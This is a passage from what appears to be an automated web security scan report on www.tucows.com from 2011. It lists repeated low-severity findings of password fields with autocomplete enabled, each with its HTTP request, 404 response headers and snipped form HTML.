Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:20 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

4.33. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/styles.css

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/themes/03BlueMeany/styles.css

Issue detail

The page contains a form with the following action URL:
The form contains the following password fields with autocomplete enabled:

Request

GET /images/newassets/includes/themes/03BlueMeany/styles.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:20 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

4.34. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/styles.css

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/themes/03BlueMeany/styles.css

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /images/newassets/includes/themes/03BlueMeany/styles.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:20 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

4.35. http://www.tucows.com/images/newassets/javascript:void(null)

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/javascript:void(null)

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /images/newassets/javascript:void(null) HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:39 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

4.36. http://www.tucows.com/images/newassets/javascript:void(null)

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/javascript:void(null)

Issue detail

The page contains a form with the following action URL: javascript:void(null);

The form contains the following password fields with autocomplete enabled: pw, pwc

Request

GET /images/newassets/javascript:void(null) HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:39 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

4.37. http://www.tucows.com/images/newassets/lostpass.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/lostpass.html

Issue detail

The page contains a form with the following action URL: javascript:void(null);

The form contains the following password field with autocomplete enabled: pw

Request

GET /images/newassets/lostpass.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:42 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

4.38. http://www.tucows.com/images/newassets/lostpass.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/lostpass.html

Issue detail

The page contains a form with the following action URL: javascript:void(null);

The form contains the following password fields with autocomplete enabled: pw, pwc

Request

GET /images/newassets/lostpass.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:42 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

4.39. http://www.tucows.com/images/newassets/privacy.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/privacy.html

Issue detail

The page contains a form with the following action URL: javascript:void(null);

The form contains the following password fields with autocomplete enabled: pw, pwc

Request

GET /images/newassets/privacy.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:13 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

4.40. http://www.tucows.com/images/newassets/privacy.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/privacy.html

Issue detail

The page contains a form with the following action URL: javascript:void(null);

The form contains the following password field with autocomplete enabled: pw

Request

GET /images/newassets/privacy.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:13 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

4.41. http://www.tucows.com/images/newassets/safesearchtoggle.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/safesearchtoggle.html

Issue detail

The page contains a form with the following action URL: javascript:void(null);

The form contains the following password field with autocomplete enabled: pw

Request

GET /images/newassets/safesearchtoggle.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:57 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

4.42. http://www.tucows.com/images/newassets/safesearchtoggle.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/safesearchtoggle.html

Issue detail

The page contains a form with the following action URL: javascript:void(null);

The form contains the following password fields with autocomplete enabled: pw, pwc

Request

GET /images/newassets/safesearchtoggle.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:57 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

4.43. http://www.tucows.com/images/newassets/search.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/search.html

Issue detail

The page contains a form with the following action URL: javascript:void(null);

The form contains the following password field with autocomplete enabled: pw

Request

GET /images/newassets/search.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:46 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

4.44. http://www.tucows.com/images/newassets/search.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/search.html

Issue detail

The page contains a form with the following action URL: javascript:void(null);

The form contains the following password fields with autocomplete enabled: pw, pwc

Request

GET /images/newassets/search.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:46 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
